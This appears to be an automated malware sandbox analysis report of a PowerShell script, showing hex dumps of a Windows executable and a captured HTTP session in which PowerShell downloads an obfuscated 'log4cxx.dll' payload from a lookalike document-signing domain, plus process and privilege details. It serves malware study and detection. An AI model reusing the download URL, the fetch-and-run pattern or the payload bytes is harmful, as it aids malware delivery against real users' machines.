                                2024-12-17 07:24:37 UTC490INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sDR*R*R*CP*S*_@a*_@*_@g*[j[*[jw*R+r**S*_@S*RP*S*RichR*
                                2024-12-17 07:24:37 UTC1369INData Raw: 00 00 00 00 00 00 00 00 09 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b1 e7 08 00 00 10 00 00 00 e8 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 8e fd 02 00 00 00 09 00 00 fe 02 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 00 0c 00 00 52 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 d7 00 00 00 90 0c 00 00 d8 00 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 71 00 00 00 70 0d 00 00 72 00 00 00 14 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: .text `.rdata@@.datatR@.rsrcP<@@.relocqpr@B
                                2024-12-17 07:24:37 UTC1369INData Raw: 03 00 89 7e 04 5f 53 e8 97 fc 01 00 8b d0 59 85 d2 74 1d 8b 4d 08 8b 09 89 0a 8b 4e 08 8b 46 04 89 14 88 ff 46 08 5e 5b 5d c2 04 00 8b c1 eb b0 33 d2 eb e6 56 8b f1 ff 4e 08 8b 56 08 8b 46 04 ff 34 90 e8 d1 fc 01 00 8b 46 04 59 8b 4e 08 5e 83 24 88 00 c3 56 8b f1 57 33 ff 39 7e 08 0f 87 a7 a4 03 00 83 66 08 00 5f 5e c3 56 8b f1 c7 06 68 09 49 00 e8 dc ff ff ff ff 76 04 e8 98 fc 01 00 59 5e c3 56 ff 15 34 07 49 00 be b0 77 4c 00 50 8b ce e8 07 16 00 00 83 f8 ff 74 14 8b 15 10 78 4c 00 8b ce 6a 02 8b 04 82 ff 30 e8 20 13 00 00 5e c2 10 00 55 8b ec 53 56 8b f1 6a 04 5b 8b 46 0c 39 46 08 74 26 53 e8 d6 fb 01 00 8b d0 59 85 d2 74 4f 8b 4d 08 8b 09 89 0a 8b 4e 08 8b 46 04 89 14 88 ff 46 08 5e 5b 5d c2 04 00 8d 0c 00 6a 08 58 3b c8 73 28 33 c9 89 46 0c f7 e3 57
                                Data Ascii: ~_SYtMNFF^[]3VNVF4FYN^$VW39~f_^VhIvY^V4IwLPtxLj0 ^USVj[F9Ft&SYtOMNFF^[]jX;s(3FW
                                2024-12-17 07:24:37 UTC1369INData Raw: 08 89 45 0c 89 4d 08 3b 53 0c 7c a5 8b 5b 04 8b 45 ec 8b 4d f0 85 db 0f 85 70 ff ff ff 57 56 e8 cc fe ff ff 8a 45 ff 5f 5e 5b 8b e5 5d c2 08 00 83 7d f0 ff 8b 7d f8 74 07 57 56 e8 b0 fe ff ff 8b 45 0c 83 38 ff 74 21 8b 00 89 45 f0 8b 4d 08 83 39 ff 74 05 8b 39 89 7d f8 ff 75 ec 6a 00 57 50 56 e8 cc fd ff ff eb 86 8b 45 f0 eb df 55 8b ec 83 ec 10 83 65 f8 00 53 56 57 8b 7d 08 33 db 43 c7 45 fc fe ff ff ff 57 89 5d f0 ff 15 28 01 49 00 8b 75 0c 88 1d 6c 78 4c 00 eb 6f ff 75 f0 33 db 53 ff 75 fc ff 75 f8 57 e8 84 fd ff ff 39 5e 0c 7e 34 8b ce 8d 86 10 08 00 00 8d 56 10 89 45 f4 f7 d9 89 55 0c 89 4d 08 80 38 08 73 53 83 c2 08 40 89 45 f4 05 f0 f7 ff ff 03 c1 89 55 0c 3b 46 0c 8b 45 f4 7c e2 8b 46 0c 3b d8 74 1a 2b c3 50 8d 86 10 08 00 00 03 c3 50 8d 43 02 8d
                                Data Ascii: EM;S|[EMpWVE_^[]}}tWVE8t!EM9t9}ujWPVEUeSVW}3CEW](IulxLou3SuuW9^~4VEUM8sS@EU;FE|F;t+PPC
                                2024-12-17 07:24:37 UTC1369INData Raw: 81 ea 33 01 00 00 0f 84 08 01 00 00 4a 0f 84 fa 00 00 00 4a 0f 84 00 9f 03 00 4a 75 c0 56 b9 b0 77 4c 00 e8 c5 0b 00 00 8b 0d 10 78 4c 00 6a 0f 8b 04 81 8b 30 ff 15 28 05 49 00 83 7e 4c ff 8b f8 74 03 8b 7e 4c 57 53 ff 15 40 01 49 00 6a 00 57 e8 55 08 00 00 eb 8f 8b c8 83 e9 4e 0f 84 aa 9e 03 00 83 e9 05 0f 84 90 9e 03 00 83 e9 28 0f 84 71 9e 03 00 83 e9 09 0f 84 52 9e 03 00 81 e9 8d 00 00 00 0f 84 30 9e 03 00 49 0f 84 12 9e 03 00 49 49 0f 85 44 ff ff ff 6a 01 e9 ec 9d 03 00 83 fa 01 0f 84 55 fe ff ff ff 75 14 ff 75 10 52 e9 2b ff ff ff 74 23 8b c8 49 0f 84 34 ff ff ff 49 75 2d 56 e8 d3 fb ff ff e9 26 ff ff ff 53 56 e8 8f fb ff ff e9 1a ff ff ff 8b c3 c1 e8 10 50 57 0f b7 c3 50 56 e8 97 fd ff ff e9 04 ff ff ff 49 74 0d 49 49 0f 85 e2 fe ff ff e9 68 9d 03
                                Data Ascii: 3JJJuVwLxLj0(I~Lt~LWS@IjWUN(qR0IIIDjUuuR+t#I4Iu-V&SVPWPVItIIh
                                2024-12-17 07:24:37 UTC1369INData Raw: ff 37 ff 15 34 06 49 00 83 cb ff 39 5e 58 74 3d 39 5e 5c 74 45 8d 45 dc 50 ff 37 ff 15 94 06 49 00 39 5e 60 0f 84 a6 9a 03 00 39 5e 64 0f 84 af 9a 03 00 80 bf 90 00 00 00 00 0f 85 7b ff ff ff e9 9d 9a 03 00 80 7d 10 00 74 b1 eb 99 66 8b 45 dc 66 89 87 88 00 00 00 eb b6 66 8b 45 e0 66 89 87 8a 00 00 00 eb ae 55 8b ec a1 b4 77 4c 00 8b 4d 18 83 f8 01 0f 85 d6 9b 03 00 8b 45 08 83 f8 ff 74 03 89 41 58 8b 45 0c 83 f8 ff 74 03 89 41 5c 8b 45 10 85 c0 7e 03 89 41 60 8b 45 14 85 c0 7e 03 89 41 64 5d c2 14 00 55 8b ec 51 a1 10 78 4c 00 56 8b 75 08 57 6a 00 8b 04 b0 8b 38 57 e8 0b fb ff ff 83 7f 18 00 0f 85 c8 9b 03 00 8b 0d 34 78 4c 00 6a 03 5a 89 55 fc 3b ca 0f 8c ad 00 00 00 a1 24 78 4c 00 8b 04 90 8b 30 85 f6 0f 84 8c 00 00 00 8b 46 04 3b 47 04 0f 85 80 00 00
                                Data Ascii: 74I9^Xt=9^\tEEP7I9^`9^d{}tfEffEfUwLMEtAXEtA\E~A`E~Ad]UQxLVuWj8W4xLjZU;$xL0F;G
                                2024-12-17 07:24:37 UTC1369INData Raw: 74 ff 34 88 e8 ac e7 01 00 8b 46 74 59 8b 4e 78 83 24 88 00 83 7e 78 03 76 0f 8b 4e 78 8b 46 74 8b 44 88 fc 83 38 00 74 cf 5f 5e 5d c2 04 00 83 8e 98 00 00 00 ff 83 8e 94 00 00 00 ff e9 6a ff ff ff 55 8b ec 51 8b 0d 28 78 4c 00 56 57 39 0d 30 78 4c 00 75 6e 81 3d 34 78 4c 00 ff ff 00 00 0f 84 8e 00 00 00 68 a0 00 00 00 e8 cf e6 01 00 59 85 c0 0f 84 80 00 00 00 8b c8 e8 fc eb ff ff 8b f8 8d 45 fc 89 7d fc 50 b9 20 78 4c 00 e8 be ea ff ff 8b 35 34 78 4c 00 46 89 35 34 78 4c 00 8b 0d 24 78 4c 00 8b c6 ff 05 30 78 4c 00 8b 0c b1 89 39 8b 4d 08 8b 49 04 89 4f 04 5f 5e 8b e5 5d c2 04 00 6a 03 5e 33 ff 3b ce 7e 0d 8b 15 24 78 4c 00 8b 04 b2 39 38 75 23 68 a0 00 00 00 e8 5b e6 01 00 59 85 c0 74 b7 8b c8 e8 8c eb ff ff 8b f8 eb ac 83 c8 ff eb c3 33 ff eb 85 46 3b
                                Data Ascii: t4FtYNx$~xvNxFtD8t_^]jUQ(xLVW90xLun=4xLhYE}P xL54xLF54xL$xL0xL9MIO_^]j^3;~$xL98u#h[Yt3F;
                                2024-12-17 07:24:37 UTC1369INData Raw: 8b e5 5d c2 20 00 33 ff e9 c1 fd ff ff 0b d8 e9 22 fe ff ff 0b d8 e9 27 fe ff ff 89 4d 14 e9 50 fe ff ff 89 4d 18 e9 52 fe ff ff 55 8b ec 83 7d 0c 00 57 bf b0 77 4c 00 0f 85 cf 96 03 00 8b 0d 1c 78 4c 00 83 f9 ff 74 7b a1 10 78 4c 00 33 d2 56 8b 04 88 8b 30 8b 0e 89 4d 0c 38 56 3a 74 0f 88 56 3a 39 96 8c 01 00 00 0f 8d b5 96 03 00 8b 7d 08 83 ff 08 0f 8f eb 96 03 00 74 1a 85 ff 74 64 83 ff 01 74 11 83 ff 02 74 51 83 ff 03 74 43 7e 29 83 ff 05 7f 31 80 7e 38 00 75 56 57 51 ff 15 1c 07 49 00 83 ff 08 74 0d 83 ff 04 74 08 ff 75 0c e8 23 30 01 00 c6 46 38 01 33 c0 40 5e 5f 5d c2 08 00 33 c0 eb f7 83 ff 06 0f 84 7d 96 03 00 eb e8 c6 46 38 01 e9 df 96 03 00 c6 46 38 01 e9 69 96 03 00 52 51 ff 15 1c 07 49 00 c6 46 38 00 eb c8 33 c0 eb c7 55 8b ec 83 7d 10 00 0f
                                Data Ascii: ] 3"'MPMRU}WwLxLt{xL3V0M8V:tV:9}ttdttQtC~)1~8uVWQIttu#0F83@^_]3}F8F8iRQIF83U}
                                2024-12-17 07:24:37 UTC1369INData Raw: 75 08 e8 82 f6 ff ff 89 46 6c eb dd 55 8b ec 51 51 8d 45 fc b9 b0 77 4c 00 50 8d 45 f8 50 ff 75 08 e8 53 f4 ff ff 84 c0 74 4b 8b 4d fc a1 24 78 4c 00 57 8b 04 88 8b 38 80 bf 90 00 00 00 1b 75 38 53 8b 5d 0c 8d 43 ff 83 f8 17 77 30 0f b6 80 f9 33 40 00 ff 24 85 dd 33 40 00 6a 01 ff 75 14 ff 75 10 53 57 e8 d8 ec ff ff 33 c0 40 5b 5f 8b e5 5d c2 20 00 33 c0 eb f6 33 c0 eb f1 33 c0 eb ec 8d 49 00 d6 33 40 00 b4 33 40 00 a3 d1 43 00 ec d1 43 00 08 d2 43 00 85 d1 43 00 d6 33 40 00 00 01 01 02 02 01 01 01 06 03 06 03 06 04 06 01 06 01 06 01 06 05 06 01 55 8b ec 83 ec 40 a1 78 72 4c 00 56 33 f6 a3 04 78 4c 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 30 07 49 00 89 45 e4 8b 45 10 89 45 f0 8b 45 0c 89 45
                                Data Ascii: uFlUQQEwLPEPuStKM$xLW8u8S]Cw03@$3@juuSW3@[_] 333I3@3@CCCC3@U@xrLV3xLjE0E+uEEu0IEEEEE
                                2024-12-17 07:24:37 UTC1369INData Raw: 8b cf e8 2c c7 01 00 8b 46 04 89 47 30 89 7e 04 5f ff 06 5e 5d c2 04 00 33 ff eb eb 8b 0d 84 82 4c 00 85 c9 75 21 ff 35 78 82 4c 00 b9 78 82 4c 00 e8 49 02 00 00 ff 35 70 82 4c 00 b9 70 82 4c 00 e8 39 02 00 00 c3 56 e9 44 9a 03 00 55 8b ec 83 ec 0c 8b 45 08 83 65 f4 00 89 45 f8 85 c0 78 1f 8d 45 f4 b9 80 82 4c 00 50 e8 bc 01 00 00 ff 75 f4 8d 4d f4 e8 05 02 00 00 8b e5 5d c2 04 00 83 65 f8 00 eb db 55 8b ec 8b 45 10 33 c9 2b c1 74 27 48 0f 85 0d 9a 03 00 ff 75 0c ff 75 08 39 0d 80 82 4c 00 75 2b b9 70 82 4c 00 e8 df 05 00 00 8b c8 8b c1 5d c2 0c 00 39 0d 80 82 4c 00 0f 85 fb 99 03 00 b9 70 82 4c 00 ff 75 0c ff 75 08 eb da b9 80 82 4c 00 e8 7c 33 05 00 8b c8 eb cc 33 c0 a3 70 82 4c 00 a3 74 82 4c 00 a3 78 82 4c 00 a3 7c 82 4c 00 a3 80 82 4c 00 a3 84 82 4c
                                Data Ascii: ,FG0~_^]3Lu!5xLxLI5pLpL9VDUEeExELPuM]eUE3+t'Huu9Lu+pL]9LpLuuL|33pLtLxL|LLL


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.749700104.21.87.654434548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-12-17 07:24:40 UTC165OUTGET /api/uz/0912545164/log4cxx.dll HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                Host: docu-signer.com
                                2024-12-17 07:24:41 UTC885INHTTP/1.1 200 OK
                                Date: Tue, 17 Dec 2024 07:24:40 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 2011444
                                Connection: close
                                Last-Modified: Sun, 15 Dec 2024 11:15:42 GMT
                                ETag: "675eba5e-1eb134"
                                Accept-Ranges: bytes
                                cf-cache-status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G0WUEuE2E%2BMva%2BPxVp9w5%2BDMXytQ422BTAVuxjzm7E2IzMfV0Gx5KbOQHm%2FZlTZVsQwbEPBtEOcZYEYq1SZ2PMYWtkQ9yLd09%2FBdeW3YBFr02jK9Y%2FWvJ3Ldd%2B0efKfKxZc%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8f352cc20c33425c-EWR
                                alt-svc: h3=":443"; ma=86400
                                server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1578&rtt_var=596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=803&delivery_rate=1828428&cwnd=226&unsent_bytes=0&cid=7b8856d62bc6350f&ts=682&x=0"
                                2024-12-17 07:24:41 UTC484INData Raw: 7c 05 55 ef ec ec ec 95 83 8a bf 8a 81 9f 83 a1 ae a0 85 a4 8f 98 80 86 a9 8d 9f 99 9e a5 b5 bb 81 a9 87 9e 98 a5 a1 96 84 b4 a1 b8 a6 ae a1 8a b4 a7 ba af 96 81 bf 9d a8 85 be a2 95 9c 85 99 b8 aa 8f ab bd b6 82 b6 aa 89 99 a3 af 80 98 bc a4 a1 bf 98 82 ba 9e 80 a4 a1 87 88 8d bb 9c 86 ba be 9c 8f a2 aa 9d b5 af 82 99 87 b8 bc a2 8b 89 94 85 82 8b aa 95 9a 81 87 ad 89 bf 95 a3 b9 88 9f 9d bb aa b6 9d bb 9b 8a bd bf b4 81 a5 99 bd ba ba 86 a5 a4 a3 bb 9e b8 9e b9 81 95 82 8a 85 a5 95 9e ab bd 9a b9 83 86 85 a7 94 84 8a b6 9b a8 86 bd 9e 96 ae 83 96 b5 ab bf a0 84 aa 94 8b a4 8f 8b b9 bf 9b 9b a7 bf 9b b4 9d bc 82 82 ab 81 8e a6 9f a2 aa af b8 aa b8 af 80 83 bf ad ba a8 83 b8 9e 88 b9 aa b9 96 8e 89 b9 89 a8 a8 86 8b 98 b5 bc 87 a6 9c 80 bc b4 bf bb 9a 81
                                Data Ascii: |U
                                2024-12-17 07:24:41 UTC1369INData Raw: 94 bc bd 85 b5 80 be 9e 95 b8 af af 9c bd 81 bf 83 b4 a3 b6 be a8 b6 86 83 a9 80 99 bd 84 be 8d 8f aa ab b8 bd 84 84 87 87 9b ae bb 96 8a 9d 9c a5 89 a8 a2 a1 b8 bc ba 8e ad bf 9a 8d af b5 9a 94 ab b4 86 89 89 b4 94 a1 b4 bd 8f 8f 9d 89 a6 a2 a5 9a 88 a4 a2 9e af 81 98 9f 8d b5 a0 98 b6 a7 9f 88 be 9d 84 ab 94 b6 9e 8e 99 af b5 b6 a7 bc b5 a6 85 a4 8e ad b8 a1 a0 86 8e aa a9 a2 a8 a5 99 bb 88 a4 9d 8e ba 87 80 8f af a0 bb 9a a2 a2 95 95 a3 99 98 a4 b5 a7 a0 8e 82 bb ae a1 a7 b6 ad 80 a6 a3 ad ad a1 b4 bc bf 8a 98 af a2 8f 96 a0 ae 80 84 98 af 84 aa 84 bc a8 8d 82 bb a6 87 aa 9e bb b6 95 a3 86 8b b5 a2 a5 9d 95 9d af a5 94 9f 82 a7 ad 9b b5 83 95 a8 bd b6 bb be a4 ab a1 9e aa 84 b9 8a a5 b4 81 85 be af bc 98 b5 a3 af 84 87 95 84 8d 9e be a2 a5 be 8a 88 b6
                                Data Ascii:
                                2024-12-17 07:24:41 UTC1369INData Raw: b5 9a 87 95 98 bf b9 be 98 95 80 9c 95 be a5 96 b9 b9 b6 9c 82 82 ba 83 a8 82 89 a7 a5 99 a5 bc a3 b9 9f b9 80 84 ab bb a6 a2 96 9c 85 b5 8d bc 9c b6 96 aa a5 94 8d 99 ad b9 a3 a1 96 9c 83 a5 bd 7c 05 55 ef ec ec ec 95 aa 8a 9c 8f 9a 94 a0 98 96 98 bb a5 bf 89 8a ab 94 ae 88 95 96 aa b9 8e 88 ab ad 94 87 8e 8b b5 b4 bb b6 8f a4 be aa a1 9f a9 bd 83 ba ae 84 88 95 9f 98 94 8e 8a 86 98 a4 9a 9f 9f 9c a0 b9 ab 9d 83 88 81 98 81 83 a4 bc a0 89 8d 82 89 b9 8e b9 a0 81 9e 8a b9 ab a4 9c aa 8d 8a a4 9b 8d a5 be 88 8d 95 a5 95 a7 80 ad 94 8d ae 81 a2 82 95 9c b5 8b af ab 88 9b 9b b8 8d 99 a5 84 80 9b 82 8f 94 a4 80 be 98 b8 8d 88 87 a6 a7 bf 88 a2 80 a0 a4 a0 84 a1 a6 bb a2 80 87 81 87 95 aa a6 99 b5 ba 8b aa 99 a3 b4 b5 88 87 8e 95 bf 88 95 8d a5 aa 8a bd a3 bf
                                Data Ascii: |U
                                2024-12-17 07:24:41 UTC1369INData Raw: b6 ae bf be be 8a 82 9d a2 81 a5 a6 8b a6 ad 80 96 a2 af 8e ab a3 95 8a ab b8 bb 80 9f 95 96 bf 82 b5 8e bc a3 bf 8b bd 99 95 83 ba 8e 9e ab a3 bc 99 80 9a 8e b6 96 95 a6 b6 af 9c 99 ba ab a3 9c 99 a9 bb b6 a2 a9 9c 82 9b 8d a3 aa 82 9d a4 a7 9f bf a9 85 a1 8e 80 9d bd b6 82 ba be 96 af 8d a5 a5 81 9c 81 a4 81 a4 8a aa 95 bc 9b 94 95 9f ab 81 bf 9b 95 85 b6 bc 86 9a 9a 87 8e a3 a0 81 99 86 bf 87 82 ba 8e 9e a1 84 be a0 bf b4 9c bc bb 8d a5 b4 85 ad 98 ba 81 9f a4 a1 82 85 9e bd bb bb 8e bb 82 a8 bb af be 89 98 a7 a9 be a8 88 bc a8 a9 ae 82 9c bf be 9f a4 af 87 83 95 a0 94 95 ae 86 9a 81 9f 89 b6 86 85 80 83 a5 86 88 84 96 80 99 a7 a1 9e a2 80 87 9b 9d 96 bb af a6 b8 b8 9a b8 81 a5 ab a9 a3 bc 95 84 86 8b 85 8e b6 88 8e ba a7 84 b5 98 86 a0 81 a3 a6 8d 99
                                Data Ascii:
                                2024-12-17 07:24:41 UTC1369INData Raw: bc ab 9a 89 a6 a5 84 a1 b8 a2 87 bc 8b a2 82 bc b6 bc 8f a2 88 9e 8d 99 ba 81 b8 a6 bc 98 a6 af 87 af a5 9c 9f a5 a4 9d 88 a3 bb 80 82 80 81 82 ad a6 af a3 81 9a 9d 8d 82 bf 9f af 89 b5 81 9e b4 95 87 a1 aa ab a8 9d 9c 87 a9 98 ad ba 88 8b 9f 9f b9 9d af 83 a4 a5 bc a8 88 8a 96 aa 96 8b 9d a8 8e ae 9d bb b6 87 88 99 a8 89 96 aa 85 87 85 b8 a6 9e 85 af aa 8d 85 94 a0 a3 a9 8a 8e a1 bd 82 b8 b4 9a 8d 95 9d a5 aa 99 ba 83 a6 bc bd bd ab 86 b4 82 b4 89 a4 a2 9a 85 a1 96 ba 9e 94 80 98 8f ae bd 9e bf 8d 8a b9 a1 8a ad 8b 84 a0 ad 83 9c a8 8d 82 95 8b a2 85 9a bc be 8e a3 8d a8 8d ad b5 95 ae 9b a8 86 84 9b aa 7c 05 55 ef ec ec ec 85 9d 8e a0 8f 96 88 bc a9 b5 a0 ae 86 8f ba 95 a8 a0 8b 84 8b af a7 94 ae 86 80 be a0 ab bc bf a6 a2 8a af 9d 8b 9a a7 80 96 bf a1
                                Data Ascii: |U
                                2024-12-17 07:24:41 UTC1369INData Raw: a4 a8 a1 a3 86 ad 82 b5 a8 a5 a6 a7 a6 83 bb 87 80 a8 b8 ae 8a b5 83 98 9d 8f 89 87 81 81 88 aa 8a 8d a1 bd 86 a2 87 a3 a3 bc 84 8b 82 86 82 83 ad 80 bf 8b a5 b9 85 85 88 ad 88 85 af 95 be af b8 b8 85 81 ab 8b ba 9a bd 84 88 a6 94 a2 a5 a8 98 8f 8f 8f 81 88 a7 8e a8 83 86 94 85 80 89 bc 83 ae 80 8b 9e 96 80 a1 87 87 83 9c 81 a6 ba ba 9b b6 a7 94 bc 98 af 81 9b 87 b5 bd b6 b8 82 9f a0 89 a7 84 b6 87 84 b9 8b a6 a9 b6 b4 a9 a9 8e 94 a1 aa 8f 80 89 a5 9f b8 9e 8f b6 9c bd af 8f bc 9c bf ae 86 8e 8e 9f 9f 9b bf bc 9e 8f 8d 99 9d a6 8d 89 9d 8d 81 83 a3 b9 b6 bf be 9f ba a8 81 a4 ad 89 98 81 94 b4 9e a8 b9 b8 af ab 83 9e 88 b9 a1 9b a1 9e a2 81 a5 9f 9a 98 ab a2 89 99 ba 9d bb 81 b4 ad 82 bd 86 9a ab 95 89 bd 81 8e ba 85 89 af 8f a1 b4 a3 a5 9f b4 af 85 81 ae
                                Data Ascii:
                                2024-12-17 07:24:41 UTC1369INData Raw: ec ec ec ec ec ec ec 2c c2 85 88 8d 98 8d ec ec ec fc ec ec ec ec ee ec ec fc ec ec ec ec ee ec ec ec ec ec ec ec ec ec ec ec ec ec ac ec ec 2c c2 98 80 9f ec ec ec ec ec fc ec ec ec fc ee ec ec fc ec ec ec fc ee ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec 2c c2 9e 88 8d 98 8d ec ec ec fc ec ec ec cc ee ec ec fc ec ec ec cc ee ec ec ec ec ec ec ec ec ec ec ec ec ec ac ec ec bc c2 9e 89 80 83 8f ec ec ec dc ec ec ec dc ee ec ec dc ec ec ec dc ee ec ec ec ec ec ec ec ec ec ec ec ec ec ac ec ec bc c2 9e 9f 9e 8f ec ec ec ec cc ec ec ec 8c ee ec ec cc ec ec ec 8c ee ec ec ec ec ec ec ec ec ec ec ec ec ec ac ec ec bc ec ec ec ec ec ec ec ec ec ec ec ec ec 6c ee ec ec ec ec ec ec f2 ee ec ec ec ec ec ec ec ec ec ec ec ec ec ac ec ec bc ec ec ec ec ec ec ec
                                Data Ascii: ,,,l
                                2024-12-17 07:24:41 UTC1369INData Raw: ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec
                                Data Ascii:
                                2024-12-17 07:24:41 UTC1369INData Raw: ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec ec
                                Data Ascii:
                                2024-12-17 07:24:41 UTC1369INData Raw: ed ae ec 67 2c 13 c9 88 ed ae ec 67 2c 13 c9 8c ed ae ec 67 2c bf 6f 28 50 57 e6 ec ec ec b8 04 b5 13 13 13 1a a8 c8 c0 ed 98 e9 e3 5b b0 c8 dc 67 2f 6f 28 a8 b7 2f 67 2c 13 c9 b0 ed ae ec 67 2c 13 c9 b4 ed ae ec 67 2c 13 c9 b8 ed ae ec 67 2c 13 c9 bc ed ae ec 67 2c 13 c9 a0 ed ae ec 67 2c 13 c9 a4 ed ae ec 67 2c 13 c9 a8 ed ae ec 67 2c 13 c9 ac ed ae ec 67 2c bf 6f 28 18 57 04 19 ad ec 6f d7 ec 99 b5 84 a8 ea ec ec 86 ec 04 4a 13 13 13 65 a8 c8 e4 6f 90 c8 e4 ec 99 eb df 2c 65 e8 c8 07 bc 67 a8 c8 e4 67 f9 08 19 ad ec 65 fc 67 a8 c8 e4 4f 08 19 ad ec df 2c 67 3c ef 3e 67 a0 c8 e4 61 b8 3d e8 65 b8 c8 e8 67 b8 c8 e8 67 e7 65 e6 67 b8 c8 e8 65 ff ac 6f 14 88 99 30 67 ef 65 a8 c8 e8 67 a8 c8 e8 67 ec 65 ef 67 a8 c8 e8 65 e8 c8 67 e8 c8 6f 28 e0 b7 2f 65 ec
                                Data Ascii: g,g,g,o(PW[g/o(/g,g,g,g,g,g,g,g,g,o(WoJeo,eggegO,g<>ga=eggegeo0geggegego(/e


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:02:24:29
                                Start date:17/12/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1"
                                Imagebase:0x7ff741d30000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:1
                                Start time:02:24:29
                                Start date:17/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Executed Functions

                                  Function 00007FFAAC463A05 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
